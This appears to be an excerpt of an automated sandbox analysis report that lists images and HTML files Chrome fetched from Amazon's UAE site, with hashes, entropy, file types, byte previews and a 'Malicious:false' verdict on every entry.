                                                                                                                                                                                                                                                                MD5:C58A37C86EE43A0BA62A0CA28F544A60
                                                                                                                                                                                                                                                                SHA1:730FDE384CC19A173B699D574E70C2E795532961
                                                                                                                                                                                                                                                                SHA-256:B4209A2A49CD50272F2068AB4AACEEAD50C2BF77EC387FBC2F9909EF3968D4AF
                                                                                                                                                                                                                                                                SHA-512:A31917DC2E2056D4E2F5A7642B92CA6D712E6E2A64A0580E64401757506C008630991C39777CCD40D9522C514841099F1201C47E83138CD0E5C1A50D9408C543
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................X.........................................................................8.3Q..(.$.....I"..:......[..nS..O.-..*].....r............bN..*Z..~zzH...|Me2..i?.v..Jq.+....F.:cmZ..G.[|.......R..x......mFk.....t...m.3..;4...@..........@.W.)_...?...v(=.3...N3..`.[M-R..lo.v.....l.....7_~[h.7....^.D-b...].mw.r.../....|{..^.............1.E.._=.t..1H............F...K....6..=S'\.o.l....'.....>..O..T..'coJ5.7.&..g.7.<y.>m...........+vJ..d\.]..-...C{{ME.o..{m.})..l#...[.E.h...K.._]VN.i.Y..jY....U..v.I.LUk.Zu..g2...{..m.$.............2".8..z.\J.........w...n...gzh.....*.w~.8+..m.l.vU/J.......y.q..c..oZ.i...?ax..\...............].B`...!....1......n....'..vi.l.4.zv..d.N{...V>..Z...HM.....I...^..............^.WD...<}.z7yh..C.....w.\.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5427
                                                                                                                                                                                                                                                                Entropy (8bit):7.8492577240864
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:9Fg5aG09NSc+f8nYYF76Ge55qbQHmxhQHA90EeCRAYO2iamwVH2YTLzRT+TI2/ex:9FgEEc+f8xV6Ge5MkGxqtEeCROZ1wVfb
                                                                                                                                                                                                                                                                MD5:A84A5BCB2242983B0638541600BBFA37
                                                                                                                                                                                                                                                                SHA1:37ACEA3B1A43937A8A980FBD824695C75FB13289
                                                                                                                                                                                                                                                                SHA-256:7785D4012F96E2BD15FBEF1241B59574B541EC348426AEC92CF965F23ED90C3E
                                                                                                                                                                                                                                                                SHA-512:91D2F8D8923F3C697F9DE2C4A50F6ECBFFB0F950B306A20B3CDF130FCF9D1232A836DF1C99CD69F6DD1A4FC46C1A6AE7651BE7BEEF18A65B6C8AA12487E0DB82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........9..............................................................................p......8..<...wYj..a..CAu.........bYk%...P....d.<.E..wg......m..z)]..m.k...*NY..9.#....Co5..j...$...../..;lg..p..^Q....Ju.S..U2.*....d.wM5.oh.Be...4CZ...O..Nr......?2li:W...n.....K...C...W6.e..x.....d........Q...g'..}...W..........'.#=...c......~,.1.[^.>..-.....|;m.M..K.mtSp....0...H...q.1..J.M..X.....g..9?'g>FW...............Y...............................!%5.&14Ua..$0AEeq.."'6FQTu..... @BDGdv...7Pf....................?....n....f9.)...$V....b.b......)..........p;.......:....`q.m..fy42...\8!.<..k..xi....[.r.6..c..{*."....{._/.69B.......;...f.M..................eJb..W............t........s1#..Ep.........3#...5.........4.U.C...e.H...e<]..A.u..0>...b..?.X.....'...r.?...).;.....S...:jv|%yzM.\....K.N.DXv.*.3
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3939
                                                                                                                                                                                                                                                                Entropy (8bit):7.882799296634111
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Ttob82k6RCAxhfcVL+KExm0j/fFzWsSXisDePS6U94aHiU8T:Sbtk6RCAxhfcV+Pm0bf0s/3PwCaHiX
                                                                                                                                                                                                                                                                MD5:B6F1D46A6B64E8B2ECFAA9B375EA7B15
                                                                                                                                                                                                                                                                SHA1:A1F6164641E1B87998BDCC21B464BA162E83B3E3
                                                                                                                                                                                                                                                                SHA-256:140375ED88F40F33AAC7B45F89AC6CA527489BBA011B1AA12321DC5C4018C535
                                                                                                                                                                                                                                                                SHA-512:5711D7CF9A60DB0A381E9353D9ED5A97AD8A906343BF6F2B41B3DD2778CDF9542EB19B7C9D5B37785661EF7B609535C5FBB70B4680BC05E3D9CD078C6AB08553
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1.."AQq.a...2r.B.%3Rb.......#c..................................................1.!..2AQ.q."Ba..#...............?..R..s.......Vk.P.k.g|`.+.#..V..\.Tg......`..r..f.]...nD.d!..'.yP...T...).%G.c...=.l.....L....+.....iH.....fGR...#.{....i...I.....@.R...s-...UBPulp+.....$...*.R...)J..R......*..+..:...8.1.}..[o......I..%.........K{.h..)#..tg.2./...j....q..TQ;......g.....Fv.~..|.i..,....42.!....~.A..=..Cs..T.......-..c......Yt..../.3O.gf.-v\..!. .E.<o_.......ld...yV...U?..:..-.........#,.0.$..znS.-...sHf..]P.g....^...O....QT....7>(..d..\....u..&..c..X.f......Nx-.rB..'....W9x-......{.....K.h... ....O.=....[...a....G.,.ya.F.....3.Mu....;...F.....q.Lt....@.T.H.[.[.[x5.8.5...i..6.~...1..........#.U=WwF.:T....}.DW9)$.......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):93200
                                                                                                                                                                                                                                                                Entropy (8bit):7.964613794669333
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:J+KMLkSQL18z2bm6y5iNp2SqeGgQanZPanCibL8SXIDFTGe7/BH2I055mdmIAVVx:kKFxuz2gSp2IGCisYIDRGei5wENLEM
                                                                                                                                                                                                                                                                MD5:950E92CD333957EA6383FF034FCDEA89
                                                                                                                                                                                                                                                                SHA1:E0452ADE87A7E6883A23D1EB3DF8973290545F99
                                                                                                                                                                                                                                                                SHA-256:CDE67805D04D7D953414011EAD65AA8AA4855D4304057309AEF3A203D2054399
                                                                                                                                                                                                                                                                SHA-512:D0A35F96EC44D68BEFD216777CAADB942A47C11ABB2DED68009A2A640A497E540E60E1FE57CBF167B83FC98DB905EF42BC3C176EFB002263F664BCAB84890171
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.............C....................................................................C.......................................................................................................................k............................!..1A.."Qaq...#28Bv....79Ru....$3Gbrt....&6CVs....5STcw.......%4....(DHdef.....................................S.........................!..1A.Qaq."2r......45...#3BRbs......C..DS....$6Tc..&7t.%............?..b...{!;.....D.Q...TD..(.|..y.T.%.6.&..*..TU(.E.....(.xQD...T.%.(.DJ(.U(.Q..ES..(.(...ER..:"Q...>.Q(..EP.E..q.DJ*.Q(....(..DJ"..E.....D..DM.xQT......(...*..*.QD..DO>.Q(.QD.%.M..D.%.(..*.D..QD..DJ(.U>...."|..DO*(....(...(..'J"x.D.&.D.'...<~tD.%.J*.6....DO."yQT.....4D.'..O.*.D.&.%.J(..DJ*.."."....(.DO..(..DJ(....'..J"Q.j"mQ....ER..Q(.."...M..].J"Q...D..ER.%.>tU:......:(..U(..%.(...E...tU..\...TD..E....*.Q...TD..~.Qph..DO....J".....E..ES..DJ"TD..DO..<(.}(.Q...E....(.DJ"oE....e....#.NHY.B....z...M....d....[jm..p..lJN......'Fl.A......v
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6348
                                                                                                                                                                                                                                                                Entropy (8bit):7.770692614349624
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WcI/2rZL6nrAmDPPsFB/k3lDHrn82XM+wfAQ+rix7c:Wn/C16r/PuB/+lDHQAM+woFriC
                                                                                                                                                                                                                                                                MD5:BA017F3D32FF9537F8C7DF8089C35895
                                                                                                                                                                                                                                                                SHA1:4075C2E7382BE4F54B9CEBFA6381297E95612644
                                                                                                                                                                                                                                                                SHA-256:0E087F4B1DBD1D35DDF3B914EC70B0A24C86A3B53B9C825EA6F4E67751A0F587
                                                                                                                                                                                                                                                                SHA-512:408FC25BDFD667141B0376DE11F0B277830C3A2D1FF1BDF1197E304DAF2E3DDEA51B7E49EE18BC3626948684C93B823A071DD0156C4FC8ED0766DA27BE68F8DE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61yiOUb7bNL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4.................................................................,...."G)...$D..:M......"n.i.P& K.0.w@...........rr."P%..#, ..t...nF.rX...5m.v............r...-.[d.a....Tn.[r0l.. ..5..7I.................-.[M..%.>V....<_P.../...P.../.IkN..A............?...wXr0..r.y8.........u....L..K...e..F...............pm.].....5..r.V.U...7F...n..o..e}.=z.=.@.............t.Z.e..f.....;y..p>.j.....}..~..0.K...O.....#^.[S................b.....k-,6.P?#.....y.g.[.............[2..~...._w.`....#f...6'.2{P..............N.v...={.,3/......';.:W.V.x.....y.#Gb........_..g..X.a.9.fE.A............7r.......l...A..._2.~......_....f.....o..8.#...|.....&6. .............\.Q[^.DH~A.....>..^.......^.}..?.}...\.=.4..6...J..................[u....BG..,...^..y}......a.._..|..o....J'w8.;..J:,.=0................z.`W.H.&.H."
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 133x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7782
                                                                                                                                                                                                                                                                Entropy (8bit):7.951354630220078
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:krepeLJVR0jjUwW13DeO/P/w3bQamnfHLnBdx+ETU:5w3hwWVDB/PeQamfrBf4
                                                                                                                                                                                                                                                                MD5:27573DBB8E52785F2959CF0A4EB56897
                                                                                                                                                                                                                                                                SHA1:414F0919BA761B828B5120FB79B7B784B3EF17C4
                                                                                                                                                                                                                                                                SHA-256:F8670097F4624D01E20977596DA2C561457BC75770409AE855D0B1065D805016
                                                                                                                                                                                                                                                                SHA-512:483EDB2DAFF918A165D18EA2BE0305BCAE64A24274A1299123326B699D1EEE33D2725E44D13B6942700DFFD6C4091158854FE6DDED0A13744EF83BA13DB6AC44
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81tzJSmT2vL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1.."AQ2q..a..#B..$3...%Sc.............................................!..1..2QR............?....C..k..m.k...>...m@..0...9..s..<U.qio...X{V.%.Y.%.,.dh.*.B.Tz ....$!..:a.=...;*.e*...K#S.L. Sd.d.h...w..sU..>.f.-..q.....F..L==.+.B.i.I.......-PD..'....K;..MPh..u.)].v}?...g.|..S....8*..L....tX..D.!.......s........F#.Y.......b'Zo.<.<.}.M.SD..Q....b#...[yH......q..Wt.c...?m&#.k8....*..%..~.V./]..i...e..w.t.AY...a.)........X$^....4..So:${......^......&..#T....?.M...Z.):.?P...Z.1mg+$.Z.<=.AQ...J.l....z*...0.?Yo`x.Wr.]-vs.gV$...h......7.y..M..8.....E:;.....a..]..Ht..\..tA.F....7.w../..6.e.i..Hw{..b#..na}.....9....g..H.{g.1t..4.;@ ].Y..{X....o=.....H..m%.L..f....[..Uuu..Xn.7R..n..p[m.....f..mKbmv.g.......R....n.9.t.7p.BYGW.G........a...A.....9
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):65568
                                                                                                                                                                                                                                                                Entropy (8bit):7.972734414417205
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:vOVvtP7gAcRAbg1KLE/1KFA/YlRe5MaqdonYTqdGNvuyb:vMFP7SRAs1KAYl45MKnYewNvuu
                                                                                                                                                                                                                                                                MD5:7EEDD01A919D7135E14C607DF9F34A8F
                                                                                                                                                                                                                                                                SHA1:D0883DE70E0B06479036934BA9CE23AC870C4900
                                                                                                                                                                                                                                                                SHA-256:CE5801AD5AC28CC87F73784BBA9E6AAE819FB432F15F5C919735453D550B9A11
                                                                                                                                                                                                                                                                SHA-512:962605CB9BA7458BE8E0D719CB57C865BFD72548F6BB5DC98A5DACEF1F8F46E4D6E86F0101D6E949F18276075BC02D4AD805E8CC373585BC663C9986AAC08FAD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................;.................................................................................X..........F.x.n[.........y..+/.....&.[?0....m................=..,{..u.(.vE....../{.ylf...C.w.u.^_. ..........F>.3..l..c.p.ws........"[..s.4..'.H............6.vh.......:........(...N.k|..,/...........V?..w6v.P`...........6.v.s.....d...........n.sck8.Z...........)5A<zO.r.f. ......C................0..;=..4~K.sKz.=..........mp... .....,...D.#.......T.b..&e.l..C....n.J!..}f.6GK.....GS.V.....?.._.z......Z..l...w5.i..Z@.... h..C.............g%+w;A.....mk.......#x...B.;=.......,w....G...'.:.y.......-r.......GmY.P..{g........./.?.'..0....]0;....]..k>|.}.Z.........*hs...:..........N.9..N.<}.U..w........H.......4.+#.{...V.....~.w.;..v....:M.?.......$...............+wj.yEb....m.]f...7.jY..;Q<y.. ..%h...C.d.L....}+;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):36296
                                                                                                                                                                                                                                                                Entropy (8bit):7.832109248332986
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:qReExE4A4Zd9npwsMHQNCuIZA2C4CGVKTK240FJ2rkwhH:fR4RnpwsNDilXVKTKoANhH
                                                                                                                                                                                                                                                                MD5:FB623184BC161602A33271A4563376BD
                                                                                                                                                                                                                                                                SHA1:6284AAC90B13CC2E85A6271805AAA12B387EE647
                                                                                                                                                                                                                                                                SHA-256:5359F266339A200AB6613D1AC16ACB678CEBB27CB00B5687FB06A93C48F5FD92
                                                                                                                                                                                                                                                                SHA-512:ED8D7A2EE4AC2D0F6E4DA35BC8AAA6EC101356DFEB134E7A6CBC1F14E95D137F9A3EB77ABEAD5F4CC008F25C29158B14584370362704757698845583E82C3F0A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.............................................................................................................................................7....Adobe.d...........,.....................................................................................U................!..1A...."#2QRXaq.....$378BTYbvw...........%&'()*4569:CDEFGHIJSUVWZcdefghijrstuxyz................................................................................k...............!1A"Qaq.....2R.....#45BTUVbr..........$3S......%&'()*6789:CDEFGHIJWXYZcdefghijstuvwxyz..............................................................................?..................................................................................................................................................................................................................................................~}R.....|.)q........TJ-.2>R.z.E....D=...E....D=....X...OJ.G.Ry...mIp..TDzm+......tZ5..L.Vw.X..}Jx..i....>f...+~.f0.U.,..^#..Rdz.n##..zd.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (7131)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):598767
                                                                                                                                                                                                                                                                Entropy (8bit):5.712980220303173
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:JPeDtmrmKudaRafd0IRYlqP+dhAM01LBWoSrWKJFkVniFtr2szsMJQe7Xn1JqjuC:RotmradaRafd0IRYlqP+dhAM01LBWoSM
                                                                                                                                                                                                                                                                MD5:3EE669E86D80747BC78B6AEE4A11A28B
                                                                                                                                                                                                                                                                SHA1:882D7D74F8C415F9EEAA4D22C0DB2E4E2EA5F0DD
                                                                                                                                                                                                                                                                SHA-256:4F51DCECA13C1D314C1BEC3ECD5A3BE9AC49447CB38F8DD80AF9ECA691C47989
                                                                                                                                                                                                                                                                SHA-512:D9A48BC9C803639B92CCAE936F6E57852F26571FBC2D9B0950BA11C879223869AF42783740AFAD781D59F7A8BDDC8517F0322FE3FF583DADD35E6BF22299C506
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/ref=nav_logo
                                                                                                                                                                                                                                                                Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 136 x 104, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5861
                                                                                                                                                                                                                                                                Entropy (8bit):7.941819196061047
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:s5LS1YmLYIid4UFrn782yy57rQflsr4971/SauFVE26HrKYz0L/aw8oBXMZc1gXx:UEYYYIidFR78MnQ9C4971Sx/6HGYz+/6
                                                                                                                                                                                                                                                                MD5:661F95800A801676A279D066C3C8114E
                                                                                                                                                                                                                                                                SHA1:C495A9B59AFD9B35A08C12513D40B8C7E7771499
                                                                                                                                                                                                                                                                SHA-256:849C8F9A22736A09D7C0C7981842D932777B5A0056CBA7DF41997C49D536225D
                                                                                                                                                                                                                                                                SHA-512:A42EC4D0051537ED8B7BD27150E4FEA8F688C3B5FF6FAB2EF03B64492DE8033517AE019F72855102BE5F4405E537A5600F987331B2B2D30F81F37FEB251FFB03
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/ydDD9hnRfziI$y7.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......h.....*.......gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13475
                                                                                                                                                                                                                                                                Entropy (8bit):7.94161949675778
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:BlGfeSi3O00hlro8KCRSL1T9Yzf3Df7nICQk:BlGDip0h1KCEJiDj5
                                                                                                                                                                                                                                                                MD5:B9EA4617404874297DA5450AB063625F
                                                                                                                                                                                                                                                                SHA1:24C35AC3CBC4B0F8F917896075B494070E154C40
                                                                                                                                                                                                                                                                SHA-256:69520ED11A70C5A69ED95F70681AF57F686231E3947F3435AA49236998CCFD59
                                                                                                                                                                                                                                                                SHA-512:540D51457B886315230E24E2FE63CB240661D5F4EE1FEF9002E7C21FE9C57A6596101A1DD13460E28796B59A3C9C0057D8D79E4A143FE8E312B0D1669D956D5C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4.................................................................g...#...z....X.`e...X.`e...X.`e...X.`e...X.`e...X..|.a...#.(....{.t.3.,.;P..^...l..8.h....g.r=..a....;.(.CW}.6...+3..Vv._|..m.@.....3.......t....d...gU6.......W0.........~..g...W.%....i......}..V..:..mA.MH.>?.....kg...N....g..l....I............ .....v:...vE.0....=.<..<.SX5...Mfw1.W.g.....Zk..O^....'t..t...9.6c6.gr.....l.M......S[...k..kg.[MB\K.~....=Z?g.Z...[.:.`.....v:...vE.0..9=.d`..3:..l....=...M.f.:..nu.*I...'..M._.7.......j.......\.a%..T......-../..l.. .....u....:`.{\.}. |.....u7l..|........4.....n.];3.......1......d...................#.(...}~_S....|....ll....9.....jLu.e)..eYz....i......}.7-P.....h...........v:...vE.0.=....q.u.f.M^../.~\..k..d.w....>....\5..7>.m.O.5..N...}S.......wl.>P..............`...W......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6541
                                                                                                                                                                                                                                                                Entropy (8bit):7.936358476954098
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TgQGYjIGJabFE4ZmyKxudwzs6DuvbtM/cpJWgAAn5OSMK8sZ+DqG:oGqE0yudwR8tM/rIn5pMyvG
                                                                                                                                                                                                                                                                MD5:EAD8C075B39EF959A7776607F06C5E50
                                                                                                                                                                                                                                                                SHA1:CA7FECDE3DAB324C864EE6DFBADD1611AA15B64E
                                                                                                                                                                                                                                                                SHA-256:CEF2782BB4D72DDF05A5EC31C5CE4D64BA44B92B22DDC8A6B135AE72FD43C396
                                                                                                                                                                                                                                                                SHA-512:E90410ABA02A7F6837E4C25FE80E11DC01C21F706A92B44FB4952844EDB728979046FA59460427529C43DCABD7B6F49772B1B21EEB37C901512A296836358148
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71Ii794TdiL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1A."2Qaq..BTr........4R..#3..$S......CDs.%b...............................................1R..A!"Qa.............?....i..1..8[.7^....>7<.h...o^.....T..Q....s........e.z..Q.c;.[ .,............+..d....p.....i.+&....K..7.-d..M.]7X.'6.V......,.4..M..._.I.B.Bl.H.M...z..h.'......t.I...O.K.Q...(.Y:...f&.5k..T...G.]..U.d..t..".w.(.....)PVE...NE+e.iJ.........I.B.U..?..9.U'..)..Ts.....f..;.D.1....K%J....*....@.!9....!.P.....'Y%..NH..H.d.&0......gA...%W.B....g.O.Z...),g./.Z...)...f..;.T...Y...J."T.P5*T#H.. m...@.!9......9....$A/.t..|.Ta..z_ .q.!.F+...].F.xRX..].G7xS]'..=.w,..].w,..T!*4(.b..NFy......l........I*........d"...k. ...Q.K....t. .U..D.R.F..gy.......o!...........u..u.....f%........r..xc.w&]4....&..\.j],.2Yc.X..1..;V..}.mH.x...R.V
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3600
                                                                                                                                                                                                                                                                Entropy (8bit):7.890786194679337
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TubK6gqdSQ7cy2Ki/jIgoQ+WWyUCRsTl7uQB:qe6gqB2Zr3Wy6xu0
                                                                                                                                                                                                                                                                MD5:730F9BF453F6D8D9E549D29D91504768
